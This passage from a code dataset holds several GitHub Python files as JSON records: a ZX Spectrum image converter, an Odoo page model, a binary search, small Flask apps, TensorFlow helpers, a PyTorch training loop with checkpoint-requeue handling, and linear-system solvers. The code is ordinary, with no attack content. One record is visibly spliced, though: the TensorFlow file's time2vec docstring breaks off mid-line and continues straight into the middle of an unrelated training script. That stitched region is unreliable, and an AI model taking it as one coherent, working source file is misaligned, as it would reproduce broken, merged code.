if data[x + i + (j + y) * w] != attr[0]:\n row |= 1 << (7 - i)\n if data[x + i + (j + y) * w] not in attr:\n attr.append(data[x + i + (j + y) * w])\n byte.append(row)\n\n if len(attr) > 2:\n parser.error(\"more than 2 colors in an attribute block in (%d, %d)\" % (x, y))\n elif len(attr) != 2:\n # if only one colour, try to find a match in an adjacent cell\n if attrib:\n prev_attr = attrib[-1]\n if prev_attr[0] == attr[0]:\n attr.append(prev_attr[1])\n if len(attr) != 2:\n attr.append(COLORS[0])\n\n # improve compression ratio\n if C2P[attr[0]] > C2I[attr[1]]:\n attr[0], attr[1] = attr[1], attr[0]\n byte = [~b & 0xff for b in byte]\n\n pixels.extend(byte)\n attrib.append(attr)\n\n attrib = [(C2P[attr[0]] | C2I[attr[1]]) for attr in attrib]\n\n interlaced = []\n for block in range(3):\n for col in range(8):\n for row in range(8):\n for line in range(32):\n interlaced.append(pixels[block * 8 * 8 * 32 \\\n + row * 32 * 8 \\\n + line * 8 \\\n + col])\n\n output = args.image + \".scr\"\n\n with open(output, \"wb\") as fh:\n fh.write(bytearray(interlaced))\n fh.write(bytearray(attrib))\n\n print(\"%r created\" % output)\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"daad-adventure-writer/daad","sub_path":"Deprecated/TAPMAST/png2scr.py","file_name":"png2scr.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"69"}
+{"seq_id":"35315096509","text":"from odoo.http import request\nfrom odoo import fields, models, SUPERUSER_ID\n\n\nclass Page(models.Model):\n _inherit = \"website.page\"\n\n group_ids = fields.Many2many(\n \"res.groups\",\n string=\"Visible Groups\",\n help=(\n \"The user needs to be in at least one of these groups for the redirect to\"\n + \" have effect\"\n ),\n )\n\n def _compute_visible(self):\n super()._compute_visible()\n if self.env.user.id != SUPERUSER_ID:\n for record in self:\n if record.group_ids and record.is_visible:\n record.is_visible = any(\n gid in request.env.user.groups_id.ids\n for gid in record.group_ids.ids\n )\n","repo_name":"ayudoo/odoo_business_relationships","sub_path":"website_user_types/models/website_page.py","file_name":"website_page.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"69"}
+{"seq_id":"7454050967","text":"# 二分查找练习,递归实现\n# 当前查找范围的首元素和尾元素下标值(left,right)\ndef binarysearch(value,key,left,right):\n # 递归的退出条件\n if left > right:\n # 查找结束,为找到\n return -1\n # 获取中间元素对应下标值\n middle = (left + right) // 2\n # 对比中间元素与查找元素\n if value[middle] == key:\n # 查找成功\n return middle\n elif value[middle] > key:\n # 若中间元素大于待查找元素值则在左侧继续查找\n # 查找范围减半:左侧下标值不变,右侧下标值变为middle-1 \n return binarysearch(value,key,left,middle-1)\n else: \n # 若中间元素小于待查找元素值,则在右侧继续查找\n # 查找范围减半:右侧下标值不变,左侧下标值变为middle+1\n return binarysearch(value,key,middle+1,right)\nif __name__ == \"__main__\":\n # 原始数据\n value = [1,2,3,4,5,6,7,8,9,10,11,12,13]\n # 待查找数据\n key = 6\n res = binarysearch(value,key,0,len(value)-1)\n if res == -1:\n print(\"查找失败\")\n print(\"查找成功,是第%d张\"%(res+1))","repo_name":"suprviserpy632157/zdy","sub_path":"ZDY/Feb_all/sort_and_calculate/poker_half_find.py","file_name":"poker_half_find.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"20839125180","text":"from os import abort\nimport flask\nfrom flask import request, jsonify\nfrom scipy.stats import norm\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\n\n\n@app.route('/', methods=['GET'])\ndef home():\n # define distribution parameters\n if 'mu' in request.args:\n mu = float(request.args['mu'])\n x = int(request.args['x'])\n sigma = float(request.args['sigma'])\n # create distribution\n dist = norm(mu, sigma)\n result = dist.cdf(x)\n print((result))\n return str(round(result,2))\n else:\n return \"Nothing Found\"\n\napp.run()","repo_name":"abdulrehman25/cdf-calculator-flask-api","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7034115003","text":"from abc import ABC\nfrom tensorflow.keras import Sequential, layers, Model, losses\nimport numpy as np\nimport tensorflow as tf\nimport pandas as pd\nfrom icecream import ic\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom typing import Optional, Tuple, List\nfrom tensorflow.python.keras.layers import Lambda\n\n\ndef tf_dataset_itr(tf_ds: tf.data.Dataset):\n for x_batch, y_batch in tf_ds:\n for x, y in zip(x_batch, y_batch):\n yield x, y\n\n\ndef rounded_accuracy(y_true, y_pred):\n \"\"\"\n Get the offset mean absolute error of rounded true and prediction values from 100%.\n value 1.0 -> Zero mean absolute error\n :param y_true: true/Ground values\n :param y_pred: prediction values\n :return: rounded mean absolute error metric\n \"\"\"\n return 1 - tf.keras.metrics.mean_absolute_error(tf.round(y_true), tf.round(y_pred))\n\n\ndef plot_confusion_matrix(model: tf.keras.Model,\n dataset: tf.data.Dataset,\n prediction_function: callable = np.argmax):\n ds = dataset.unbatch()\n y_true = np.array([y for _, y in ds.unbatch().as_numpy_iterator()])\n y_pred = [model.predict(x) for x, _ in ds.unbatch().as_numpy_iterator()]\n y_pred = np.array(map(prediction_function, y_pred))\n cm = tf.math.confusion_matrix(y_true, y_pred)\n cm = pd.DataFrame(np.array(cm))\n sns.heatmap(cm, annot=True)\n\n\ndef get_x_shape(tf_ds):\n return np.squeeze(next(tf_dataset_itr(tf_ds))[0]).shape\n\n\ndef ds_x_data(tf_ds):\n return np.array([x for x, _ in tf_ds.as_numpy_iterator()])\n\n\ndef ds_y_data(tf_ds):\n return np.array([y for _, y in tf_ds.as_numpy_iterator()])\n\n\ndef get_random_sample(tf_ds: tf.data.Dataset,\n sample_size: int = 1):\n \"\"\"\n Get a random sample from tf.data.Dataset\n :param tf_ds: tf.data.Dataset object\n :param sample_size: sample size\n :return: random sample of x_data and y_data as numpy.array()\n \"\"\"\n ds = tf_ds.shuffle(1024)\n x_data = np.array([x for x, _ in ds.take(sample_size)])\n y_data = np.array([y for _, y in ds.take(sample_size)])\n return x_data, y_data\n\n\ndef train_test_dataset_spilt(tf_ds: tf.data.Dataset,\n split: float = 0.2,\n batch_size: int = 32,\n dataset_length: int = None) \\\n -> Tuple[tf.data.Dataset, tf.data.Dataset]:\n \"\"\"\n Splits an Exsiting tf.Data.Dataset into Train and Test tf.data.Datasets\n :param tf_ds: The tf.Data.Dataset object\n :param split: test data fraction (0.0 < split < 1.0)\n :param batch_size: Batch size\n :param dataset_length: Defaults to len(tf_ds), otherwise can specify here.\n :return:\n \"\"\"\n assert 0.0 < split < 1.0\n assert batch_size > 0\n ds = tf_ds.shuffle(1024).batch(batch_size).prefetch(tf.data.experimental.AUTOTUNE)\n n = len(ds) if dataset_length is None else dataset_length\n test_ds = ds.take(int(split * n)).shuffle(1024, reshuffle_each_iteration=True).prefetch(\n tf.data.experimental.AUTOTUNE)\n train_ds = ds.skip(int(split * n)).take(int((1 - split) * n)).shuffle(1024, reshuffle_each_iteration=True).prefetch(\n tf.data.experimental.AUTOTUNE)\n return train_ds, test_ds\n\n\ndef relative_tensor(tensor: tf.float64, row: int):\n return tf.concat([tensor[:row], tensor[row + 1:]], axis=0)\n\n\ndef relative_variance(tensor: tf.float64, axis: int = 0):\n if axis > 2:\n raise ValueError('axis must be 0->rows or 1->columns.')\n elif axis == 1:\n t = tf.transpose(tensor)\n else:\n t = tensor\n trr_rows = []\n for row in range(tensor.shape[0]):\n trr_row = relative_tensor(t, row)\n trr_row = tf.math.reduce_variance(trr_row, axis=1)\n trr_row = tf.expand_dims(trr_row, axis=1)\n 
trr_rows.append(trr_row)\n trr = tf.concat(trr_rows, axis=1)\n trr = tf.squeeze(trr)\n return tf.transpose(trr) if axis == 1 else trr\n\n\ndef tensor_minmax_scaler(tensor):\n min_val = tf.math.reduce_min(tensor)\n max_val = tf.math.reduce_max(tensor)\n return (tensor - min_val) / max_val\n\n\ndef tensor_standard_scaler(tensor):\n mu = tf.math.reduce_mean(tensor)\n std = tf.math.reduce_std(tensor)\n return (tensor - mu) / std\n\n\ndef variance_outlier_extraction(tensor):\n tensor = tensor_minmax_scaler(tensor)\n t_row = relative_variance(tensor)\n t_col = relative_variance(tensor, axis=1)\n trc = tf.math.reduce_min(tf.concat([\n tf.expand_dims(t_row, axis=2),\n tf.expand_dims(t_col, axis=2),\n ],\n axis=2),\n axis=2)\n trc = tf.expand_dims(trc, axis=2)\n trc = tf.image.flip_up_down(trc)\n return tensor_minmax_scaler(tensor)\n\n\ndef variance_outlier_extraction_layer():\n return tf.keras.layers.Lambda(variance_outlier_extraction)\n\n\ndef time2vec(input_dim: int, output_dim: int, name: str = 'Time2Vec', **kwargs):\n \"\"\"\n Time2Vec Encoding outputting Vector Representation of Time\n Citation:\n URL https://arxiv.org/abs/1907.05321\n @misc{https://doi.org/10.48550/arxiv.1907.05321,\n doi = {10.48550/ARXIV.1907.05321},\n url = {https://arxiv.org/abs/1907.05321},\n author = {Kazemi, Seyed Mehran and Goel, Rishab and Eghbali, Sepehr and Ramanan, Janahan and Sahota,\n Jaspreet and Thakur, Sanjay and Wu, Stella and Smyth, Cathal and Poupart, Pascal and Brubaker, Marcus},\n keywords = {Machine Learning (cs.LG), FOS: Computer and information sciences, FOS: Computer and information sciences},\n title = {Time2Vec: Learning a Vector Representation of Time},\n publisher = {arXiv},\n year = {2019},\n copyright = {Creative Commons Attribution Non-Commercial Share Alike 4.0 International}\n }\n :param input_dim: Size of the input (batch, input_dim)\n :param output_dim: Size of the output (batch, output_dim)\n :param name: Keras Layer name\n :param kwargs: tf.keras.Model() keywords\n :return: (batch, output_dim) Vector Representation of Time\n \"\"\"\n # tou (batch, signal)\n # y0 = w0 . t + phi0 ; k=0\n tou = tf.keras.layers.Input((input_dim,))\n y0 = tf.keras.layers.Dense(1, activation=None)(tou)\n # y = sin( W . 
t + Phi ); 0 implement whatever makes sense in your environment below.'''\n # ==========================================================================\n\n if os.path.isfile(os.path.join(RESUME_PATH, CHECKPOINT_filename)):\n logger.info('time is up, back to queue')\n SCRIPT_PATH = sys.argv[0]\n # USERTODO : Implement command to launch a new job resuming this one\n # command =\n # ==========================================================================\n\n logger.info('Executing %s' % command)\n if os.system(command):\n raise RuntimeError('launch failed')\n time.sleep(3)\n logger.info('New job submitted to the queue, saving checkpoint')\n return\n\n''' Install signal handler\n'''\nsignal.signal(signal.SIGUSR1, signalHandler)\n\nfeat_ind = {\n 'fpn_res5_2_sum': 0,\n 'fpn_res4_5_sum': 1,\n 'fpn_res3_3_sum': 2,\n 'fpn_res2_2_sum': 3\n}\n\n#-------------------------------------------------------------------------------\n# Elementary functions\ndef prepareMultiscaleForForwardOnGpu(*tensors, **kwargs):\n assert 'nb_scales' in kwargs.keys()\n if 'gpu_id' not in kwargs.keys():\n kwargs['gpu_id'] = 0\n rslt = []\n def prepareTensor(tensor, gpu_id):\n return Variable(tensor.cuda(gpu_id), requires_grad = False)\n for ind, tens in enumerate(tensors):\n rslt.append({})\n assert isinstance(tens, dict), \\\n 'No other cases considered for multiscale for now.'\n\n for k, v in tens.items():\n rslt[ind][k] = []\n for sc in range(kwargs['nb_scales'][feat_ind[k]]):\n rslt[ind][k].append(prepareTensor(v[sc], gpu_id = kwargs['gpu_id']))\n return rslt\n\n\ndef resetTrainStatsSingleFrameMultiscale(opt):\n rstats = {}\n levelNames = ['fpn_res5_2_sum', 'fpn_res4_5_sum', 'fpn_res3_3_sum', 'fpn_res2_2_sum']\n for l in range(opt['FfpnLevels']):\n lev = levelNames[l]\n for loss_type in opt['loss_features']:\n for sc in range(opt['nb_scales'][l]):\n rstats['train_%s-%s-%s' % (lev, loss_type, sc)] = []\n\n return rstats\n\n\ndef resetValStatsSingleFrameMultiscale(opt):\n rstats = {}\n levelNames = ['fpn_res5_2_sum', 'fpn_res4_5_sum', 'fpn_res3_3_sum', 'fpn_res2_2_sum']\n for l in range(opt['FfpnLevels']):\n lev = levelNames[l]\n for loss_type in opt['loss_features']:\n for sc in range(opt['nb_scales'][l]):\n rstats['val_%s-%s-%s' % (lev, loss_type, sc)] = []\n\n return rstats\n\n\ndef resetTrainProgressMultiscale(opt, train_loader, stats):\n runningTrainLoss = 0.0\n train_loader.reset(reshuffle = True)\n # Stats\n for t in range(opt['n_target_frames']):\n stats['t+%d' % (t+1)] = {}\n stats['t+%d' % (t+1)].update(resetTrainStatsSingleFrameMultiscale(opt))\n stats['train_ae_loss_values'] = []\n return runningTrainLoss\n\n\ndef resetValProgressMultiscale(opt, val_loader, stats):\n totalValLoss = 0.0\n ctValIt = 0\n val_loader.reset()\n # Stats\n for t in range(opt['n_target_frames']):\n if not stats.has_key('t+%d' % (t+1)): stats['t+%d' % (t+1)] = {}\n stats['t+%d' % (t+1)].update(resetValStatsSingleFrameMultiscale(opt))\n stats['val_ae_loss_values'] = []\n return totalValLoss, ctValIt\n\ndef reshapeMultiscaleTargetsForCriterion(targets, nT, nb_feat, nb_scales):\n seq_targets = []\n for t in range(nT):\n rtargets = {}\n for k, v in targets.items():\n rtargets[k] = []\n for sc in range(nb_scales[feat_ind[k]]):\n assert v[sc].dim() == 4\n assert v[sc].size(1) == nT * nb_feat\n st, en = t * nb_feat, (t+1) * nb_feat\n rtargets[k].append(v[sc][:, st:en, :, :])\n seq_targets.append(rtargets)\n return seq_targets\n\ndef updateTrainProgress(opt, runningTrainLoss, lossdata, loss_terms, stats, i, rtl_period, epoch):\n 
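# Record the batch loss and each target frame's loss terms in the stats dict,\n # then log (and reset) the running average every rtl_period iterations.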
stats['train_ae_loss_values'].append(lossdata)\n for kt, vt in enumerate(loss_terms):\n for ks, vs in vt.items() :\n stats['t+%d' % (kt+1)]['train_'+ks].append(vs)\n runningTrainLoss += lossdata\n if i % rtl_period == (rtl_period -1):\n avgRunningTrainLoss = runningTrainLoss / rtl_period\n logger.info('[%d, %5d] running train loss: %.3f' %\n (epoch + 1, i + 1, avgRunningTrainLoss))\n runningTrainLoss = 0.0\n\n return runningTrainLoss\n\ndef updateValProgress(totalValLoss, ctValIt, lossdata, loss_terms, stats, epoch, i, rtl_period):\n stats['val_ae_loss_values'].append(lossdata)\n for kt, vt in enumerate(loss_terms):\n for ks, vs in vt.items() :\n stats['t+%d' % (kt+1)]['val_'+ks].append(vs)\n totalValLoss += lossdata\n ctValIt += 1\n if i % rtl_period == (rtl_period -1):\n avgValLoss = totalValLoss / ctValIt\n logger.info('[%d, %5d] mean validation loss: %.3f' %\n (epoch + 1, i + 1, avgValLoss))\n return totalValLoss, ctValIt\n\n\ndef checkIsBest(totalValLoss, ctValIt, bestModelPerf=None):\n current_val = - totalValLoss/ctValIt\n sigma = 0.001\n logger.info('Current val : %.3f' % current_val)\n if bestModelPerf is None:\n bestModelPerf = current_val\n logger.info(\"Self bestModelPerf : %.3f\" % bestModelPerf)\n return False, bestModelPerf\n else:\n if current_val > bestModelPerf + sigma:\n bestModelPerf = current_val\n logger.info(\"Self bestModelPerf : %.3f\" % bestModelPerf)\n return True, bestModelPerf\n else:\n logger.info(\"Self bestModelPerf : %.3f\" % bestModelPerf)\n return False, bestModelPerf\n\n\ndef format_variable_length_multiscale_sequence(outputs, ffpn_levels, nT, nb_scales):\n \"\"\" Only implemented in case single feature training...\"\"\"\n find_feature_by_dim = {\n 32 : 'fpn_res5_2_sum', 64 : 'fpn_res4_5_sum',\n 128 : 'fpn_res3_3_sum', 256 : 'fpn_res2_2_sum'}\n seq_outputs = []\n assert len(outputs) == nT * ffpn_levels\n current_frame = 0\n feat = None\n for f, out in enumerate(outputs):\n if len(seq_outputs) == current_frame: seq_outputs.append({})\n if feat is None: feat = find_feature_by_dim[out[-1].size(2)]\n assert len(out) == nb_scales[feat_ind[feat]]\n assert find_feature_by_dim[out[-1].size(2)] == feat\n seq_outputs[current_frame][feat] = out\n current_frame +=1\n if (f+1)%nT == 0:\n current_frame = 0\n feat = None\n return seq_outputs\n\n#-------------------------------------------------------------------------------\n# Main functions\ndef train_multiscale(opt, model, train_loader, criterion, optimizer, epoch, stats, best_prec1, start_iter = 0):\n global SIGNAL_RECEIVED\n from detectron.utils.timer import Timer\n t = Timer()\n model.train()\n\n runningTrainLoss = resetTrainProgressMultiscale(opt, train_loader, stats)\n rtl_period = max(5, int(len(train_loader)/1))\n logger.info('-------------------------- Training epoch #%d --------------------------' % (epoch+1))\n t.tic()\n # set the variables for signal_handler\n global RESUME_PATH, NUM_GPUS\n RESUME_PATH = opt['save']\n NUM_GPUS = opt['gpu_id'] + 1 # relies assumption that the model uses the last GPU\n\n for i, data in enumerate(train_loader):\n # Skip the iterations included in the checkpoint\n if i < start_iter: continue\n\n # Get and prepare data\n inputs, targets, _ = data\n inputs, targets = prepareMultiscaleForForwardOnGpu(inputs, targets, **{'gpu_id' : opt['gpu_id'], 'nb_scales': opt['nb_scales']})\n targets = reshapeMultiscaleTargetsForCriterion(targets, opt['n_target_frames'], opt['nb_features'], opt['nb_scales'])\n # Optimization\n optimizer.zero_grad()\n ffpnlevels = 1 if opt['train_single_level'] 
else opt['FfpnLevels']\n outputs = format_variable_length_multiscale_sequence(model(inputs), ffpnlevels, opt['n_target_frames'], opt['nb_scales'])\n loss, loss_terms = criterion(outputs, targets)\n loss.backward()\n optimizer.step()\n\n # Update progress\n runningTrainLoss = updateTrainProgress(opt, runningTrainLoss, loss.item(), loss_terms, stats, i, rtl_period, epoch)\n\n if SIGNAL_RECEIVED:\n save_checkpoint({\n 'epoch': epoch,\n 'iter': i+1,\n 'opt_path': os.path.join(opt['logs'], 'params.pkl'),\n 'state_dict': model.state_dict(),\n 'best_prec1': best_prec1,\n 'optimizer' : optimizer.state_dict(),\n }, False, savedir = opt['save'])\n logger.info('Saved checkpoint before exiting peacefully for job requeuing')\n exit(0)\n del loss, inputs, outputs, targets, loss_terms\n t.toc() ; t.tic()\n if i >= (opt['it']-1) : break\n print('Training iteration average duration : %f' % t.average_time)\n\n\ndef val_multiscale(opt, model, val_loader, criterion, epoch, stats, bestModelPerf, optimizer):\n global SIGNAL_RECEIVED\n from detectron.utils.timer import Timer\n t = Timer()\n model.eval()\n totalValLoss, ctValIt = resetValProgressMultiscale(opt, val_loader, stats)\n rtl_period = max(5, int(len(val_loader)/1))\n t.tic()\n coco_cityscapes_dataset = val_loader.data_source.dataset.dataset.dataset\n json_classes = coco_cityscapes_dataset.classes\n with torch.no_grad():\n for i, data in enumerate(val_loader):\n # Get and prepare data\n inputs, targets, seqIDs = data\n inputs, targets = prepareMultiscaleForForwardOnGpu(inputs, targets, **{'gpu_id' : opt['gpu_id'], 'nb_scales': opt['nb_scales']})\n targets = reshapeMultiscaleTargetsForCriterion(targets, opt['n_target_frames'], opt['nb_features'], opt['nb_scales'])\n # Evaluation\n ffpnlevels = 1 if opt['train_single_level'] else opt['FfpnLevels']\n outputs = format_variable_length_multiscale_sequence(model(inputs), ffpnlevels, opt['n_target_frames'], opt['nb_scales'])\n loss, loss_terms = criterion(outputs, targets)\n # Update progress\n totalValLoss, ctValIt = updateValProgress(totalValLoss, ctValIt, loss.item(), loss_terms, stats, epoch, i, rtl_period)\n t.toc() ; t.tic()\n if SIGNAL_RECEIVED:\n save_checkpoint({\n 'epoch': epoch + 1,\n 'iter': 0,\n 'opt_path': os.path.join(opt['logs'], 'params.pkl'),\n 'state_dict': model.state_dict(),\n 'best_prec1': bestModelPerf,\n 'optimizer' : optimizer.state_dict(),\n }, False, savedir = opt['save'])\n logger.info('Saved checkpoint before exiting peacefully for job requeuing')\n exit(0)\n del loss, inputs, outputs, targets, loss_terms\n if i >= (opt['it']-1) : break\n logger.info('Validation iteration average duration : %f' % t.average_time)\n\n return checkIsBest(totalValLoss, ctValIt, bestModelPerf=bestModelPerf)\n\n\ndef save(model, optimizer, epoch, entireSetOptions, stats, isBestModel, bestModelPerf):\n nEs = entireSetOptions['nEpocheSave']\n logger.info('Saving results to %s' % entireSetOptions['save'])\n logger.info('Saving model to '+entireSetOptions['save'] + 'model_%dep.net' % (epoch+1))\n torch.save(model.state_dict(), entireSetOptions['save'] + 'model_%dep.net' % (epoch+1))\n save_checkpoint({\n 'epoch': epoch + 1,\n 'iter': 0,\n 'opt_path': os.path.join(entireSetOptions['logs'], 'params.pkl'),\n 'state_dict': model.state_dict(),\n 'best_prec1': bestModelPerf,\n 'optimizer' : optimizer.state_dict(),\n },\n isBestModel,\n savedir = entireSetOptions['save'])\n train_mean_ae_loss = np.mean(stats['train_ae_loss_values'])\n val_mean_ae_loss = np.mean(stats['val_ae_loss_values'])\n logger.info('Mean 
autoencoder loss throughout training epoch: %.5f' % train_mean_ae_loss)\n logger.info('Mean autoencoder loss of validation epoch: %.5f' % val_mean_ae_loss)\n\n logs = dict([('n_epoch', epoch+1)])\n for k, v in stats.items() :\n if isinstance(v, dict):\n for kv, vv in v.items():\n logs['_'.join((k, kv))] = np.mean(vv)\n else:\n logs[k] = np.mean(v)\n\n logger.info(\"__log__:%s\" % json.dumps(logs))\n","repo_name":"facebookresearch/instpred","sub_path":"autoregressive_training.py","file_name":"autoregressive_training.py","file_ext":"py","file_size_in_byte":13383,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"69"}
+{"seq_id":"9483104451","text":"import flask\nimport base64\nimport json\nimport time\nimport couchdbkit\nfrom werkzeug.contrib.cache import SimpleCache as Cache\nfrom xml.sax.saxutils import escape as htmlescape\nfrom habitat import uploader\nfrom . import couch_to_xml\nfrom habitat.utils.startup import load_config, setup_logging\n\n# Monkey patch float precision\njson.encoder.FLOAT_REPR = lambda o: format(o, '.5f')\n\napp = flask.Flask(\"habitat_transition.app\")\ncache = Cache(threshold=10, default_timeout=60)\n\n# Load config here :S ?\n# N.B.: Searches working directory since it won't be specified in argv.\n# Configure uwsgi appropriately.\nconfig = load_config()\nsetup_logging(config, \"transition_app\")\ncouch_settings = {\"couch_uri\": config[\"couch_uri\"],\n \"couch_db\": config[\"couch_db\"]}\n\n@app.route(\"/\")\ndef hello():\n return \"\"\"\n \n \n\n payloads list \n XML
\n\n receivers list \n JSON
\n\n \n\n \n\n \n\n \n \n \"\"\"\n\ndef get_time_created():\n if \"time_created\" not in flask.request.form:\n return None\n\n time_created = flask.request.form[\"time_created\"]\n if not time_created:\n return None\n\n return int(time_created)\n\n@app.route(\"/payload_telemetry\", methods=[\"POST\"])\ndef payload_telemetry():\n callsign = flask.request.form[\"callsign\"]\n string = flask.request.form[\"string\"]\n string_type = flask.request.form[\"string_type\"]\n metadata = json.loads(flask.request.form[\"metadata\"])\n time_created = get_time_created()\n\n if string_type == \"base64\":\n string = base64.b64decode(string)\n elif string_type == \"ascii\" or string_type == \"ascii-stripped\":\n string = string.encode(\"utf8\")\n\n if string_type == \"ascii-stripped\":\n string += \"\\n\"\n\n assert callsign and string\n assert isinstance(metadata, dict)\n\n u = uploader.Uploader(callsign=callsign, **couch_settings)\n try:\n u.payload_telemetry(string, metadata, time_created)\n except uploader.UnmergeableError:\n app.logger.warning(\"Unmergeable: %s (%r)\", callsign, string)\n\n return \"OK\"\n\n@app.route(\"/listener_information\", methods=[\"POST\"])\ndef listener_information():\n callsign = flask.request.form[\"callsign\"]\n data = json.loads(flask.request.form[\"data\"])\n time_created = get_time_created()\n\n assert callsign and data\n assert isinstance(data, dict)\n\n u = uploader.Uploader(callsign=callsign, **couch_settings)\n u.listener_information(data, time_created)\n\n return \"OK\"\n\n@app.route(\"/listener_telemetry\", methods=[\"POST\"])\ndef listener_telemetry():\n callsign = flask.request.form[\"callsign\"]\n data = json.loads(flask.request.form[\"data\"])\n time_created = get_time_created()\n\n assert callsign and data\n assert isinstance(data, dict)\n\n u = uploader.Uploader(callsign=callsign, **couch_settings)\n u.listener_telemetry(data, time_created)\n\n return \"OK\"\n\n@app.route(\"/allpayloads\")\ndef allpayloads():\n text = cache.get('allpayloads')\n if text is None:\n text = couch_to_xml.dump_xml(**couch_settings)\n cache.set('allpayloads', text)\n response = flask.make_response(text)\n set_expires(response, 60)\n return response\n\ndef set_expires(response, diff):\n expires = time.time() + diff\n expires = time.strftime(\"%a, %d %b %Y %H:%M:%S +0000\",\n time.gmtime(expires))\n\n response.headers[\"Expires\"] = expires\n\nHTML_DESCRIPTION = u\"\"\"\n \nRadio: {radio_safe} \nAntenna: {antenna_safe} \nLast Contact: {tdiff_hours} hours ago \n \n\"\"\"\n\ndef listener_map(callsign, data):\n try:\n info = data[\"information\"][\"data\"]\n telemetry = data[\"telemetry\"][\"data\"]\n\n tdiff = int(time.time()) - data[\"latest\"]\n tdiff_hours = tdiff / 3600\n\n for key in [\"radio\", \"antenna\"]:\n if key not in info:\n info[key] = \"Unknown\"\n\n if \"altitude\" not in telemetry:\n telemetry[\"altitude\"] = 0.0\n\n info[\"radio_safe\"] = htmlescape(info[\"radio\"])\n info[\"antenna_safe\"] = htmlescape(info[\"antenna\"])\n info[\"tdiff_hours\"] = tdiff_hours\n\n return {\n \"name\": callsign,\n \"lat\": telemetry[\"latitude\"],\n \"lon\": telemetry[\"longitude\"],\n \"alt\": telemetry[\"altitude\"],\n \"tdiff_hours\": tdiff_hours,\n \"description\": HTML_DESCRIPTION.format(**info)\n }\n except KeyError:\n return None\n\ndef receivers_load(couch_db):\n listeners = {}\n\n yesterday = int(time.time() - (24 * 60 * 60))\n startkey = [yesterday, None]\n o = {\"startkey\": startkey}\n\n for doc_type in [\"information\", \"telemetry\"]:\n view_name = 
\"listener_{0}/time_created_callsign\".format(doc_type)\n view = couch_db.view(view_name, **o)\n\n for result in view:\n (time_uploaded, callsign) = result[\"key\"]\n\n l = {doc_type: result[\"id\"], \"latest\": time_uploaded}\n\n if callsign not in listeners:\n listeners[callsign] = l\n else:\n listeners[callsign].update(l)\n\n required_ids = {}\n remove_listeners = []\n for callsign in listeners:\n l = listeners[callsign]\n\n if not callsign or \"chase\" in callsign \\\n or \"information\" not in l or \"telemetry\" not in l:\n remove_listeners.append(callsign)\n else:\n required_ids[listeners[callsign][\"information\"]] = callsign\n required_ids[listeners[callsign][\"telemetry\"]] = callsign\n\n for callsign in remove_listeners:\n del listeners[callsign]\n\n docs = couch_db.all_docs(keys=required_ids.keys(), include_docs=True)\n\n for result in docs:\n doc_id = result[\"id\"]\n doc = result[\"doc\"]\n\n callsign = required_ids[doc_id]\n if doc[\"type\"] == \"listener_information\":\n listeners[callsign][\"information\"] = doc\n elif doc[\"type\"] == \"listener_telemetry\":\n listeners[callsign][\"telemetry\"] = doc\n else:\n raise KeyError(\"type\")\n\n return listeners\n\n@app.route(\"/receivers\")\ndef receivers():\n couch_server = couchdbkit.Server(couch_settings[\"couch_uri\"])\n couch_db = couch_server[couch_settings[\"couch_db\"]]\n\n listeners = receivers_load(couch_db)\n\n response_data = []\n for callsign in listeners:\n l = listener_map(callsign, listeners[callsign])\n if l is not None:\n response_data.append(l)\n\n response = flask.make_response(json.dumps(response_data))\n set_expires(response, 10 * 60)\n response.headers[\"Content-type\"] = \"application/json\"\n return response\n","repo_name":"ukhas/habitat-transition","sub_path":"habitat_transition/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7912,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"7746300639","text":"#####################################################################################################\r\n# Milos Atz\r\n# NE155 Homework 5\r\n#####################################################################################################\r\nimport math\r\nimport numpy as np\r\nimport scipy\r\n#####################################################################################################\r\n# Problem 4\r\n# Write a program to implement the following iterative methods for a matrix with n unknowns.\r\n# (a) Jacobi method\r\n# (b) Gauss Seidel method\r\n# (c) SOR method\r\n#####################################################################################################\r\n# First, build the system using the method performed in Problem 1\r\ndef matrix_build(n):\r\n\ta=[-1]*int(n-1)\r\n\tb=[4]*int(n)\r\n\tc=[-1]*int(n-1)\r\n\tA=np.matrix(np.diag(a, -1) + np.diag(b, 0) + np.diag(c, 1))\r\n\treturn(A)\r\ndef b_build(n):\r\n\tb=np.zeros(n)\r\n\tfor i in range(0, n):\r\n\t\tb[i]=100\r\n\tb=np.transpose(np.matrix(b))\r\n\treturn(b)\r\n#####################################################################################################\r\n# a) Jacobi method\r\n# Strategy: use a while loop to iterate while some convergence equation between x_old and x_new is greater than the input tolerance. The initial values for x are defined as x_old. In every while loop, x_new is calculated based on x_old. The error is then calculated. If the error tolerance is met, the while loop ends; if not, x_old = x_new and the loop repeats. I should implement an iteration counter to count the number of loops.\r\ndef jacobi_solver(A, b, tol=1e-6):\r\n\tn=b.size\r\n\tif(b.size!=A.shape[0] or b.size!=A.shape[1]):\r\n\t\tsys.exit('dimensions of A and b do not agree')\r\n\tx_old=np.transpose(np.matrix(np.zeros(n)))\r\n\tD=np.diag(np.diag(A))\r\n\tD_inv=np.linalg.inv(D)\r\n\tconv=1\r\n\tcounter=0\r\n\twhile(conv>tol):\r\n\t\tx_new=D_inv*(D-A)*x_old+D_inv*b\r\n\t\t#print(x_new)\r\n\t\tconv=np.linalg.norm(x_new-x_old)\r\n\t\tx_old=x_new\r\n\t\tcounter=counter+1\r\n\tprint('counter= '+str(counter))\r\n\tprint('absolute error = '+str(conv))\r\n\treturn(x_new)\r\n#####################################################################################################\r\n# b) Gauss-Seidel Method\r\ndef gs_solver(A, b, tol=1e-6):\r\n\tif(min(np.linalg.eigvals(A)<0)):\r\n\t\tsys.exit('A is not positive definite')\r\n\tif((A.transpose() != A).all()):\r\n\t\tsys.exit('A is not symmetric')\r\n\tif(b.size!=A.shape[0] or b.size!=A.shape[1]):\r\n\t\tsys.exit('dimensions of A and b do not 